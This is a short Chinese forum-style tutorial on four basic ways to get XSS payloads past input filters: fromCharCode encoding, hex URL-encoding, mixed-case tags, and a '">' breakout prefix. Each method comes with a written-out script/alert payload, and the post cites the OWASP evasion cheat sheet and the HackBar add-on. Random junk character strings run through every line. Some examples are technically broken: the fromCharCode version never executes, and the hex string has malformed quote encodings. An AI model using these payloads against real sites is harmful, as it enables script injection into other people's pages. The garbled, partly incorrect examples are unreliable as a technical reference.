四种超级基础的绕过方法。
1 B. w/ Z" E% @. T1.转换为ASCII码0 v& ~6 k4 Y ]+ \! @
例子:原脚本为<script>alert(‘I love F4ck’)</script >
3 d7 A2 S- c9 @) \1 g+ x6 a" {" |通过转换,变成:5 ]3 e7 t) Y& Z6 N1 i9 H0 X, {7 }* X
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
: b) F0 I' m6 _' s% \1 z- c
2 S, ~0 ?6 g# e2.转换为HEX(十六进制)% H& T1 F* i9 ?/ Y3 c/ k$ p
例子:原脚本为<script>alert(‘I love F4ck’)</script>4 H! ^$ @) }1 g3 o, ~1 {/ X Q
通过转换,变成:5 ~0 B8 S, F+ s. v/ [1 ~
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
% `. K* A7 ]4 U' _! C: p
" g* N! [% c3 c, X7 N# @! _3.转换脚本的大小写4 `5 p# l/ _$ Q0 F$ w1 ^% X- Z
例子:原脚本为<script>alert(‘I love F4ck’)</script>
; l$ v1 c7 Y( @% @: }8 X5 K转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>& S8 o% d" j4 J+ p. ^" Z4 |5 o, o8 l
) T' u6 I$ T# o. ?' l: R0 H4.增加闭合标记”>( q8 H9 X" C0 ], q7 a# \
例子:原脚本为<script>alert(‘I love F4ck’)</script>$ P, z3 z( K7 b3 U5 _0 O; P# F8 C
转换为:”><script>alert(‘I love F4ck’)</script>, ~4 ~9 h d! S+ B- s& T
更详细绕过技术请参考此网页
: A' Q" g3 U5 |* Y( H- e: p6 a: \https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet3 n; l& p! o! N# L# I0 ~5 C5 ]
; ^0 A) x! [1 @2 z: f; V' a转换工具使用的是火狐的 hackbar mozilla addon. |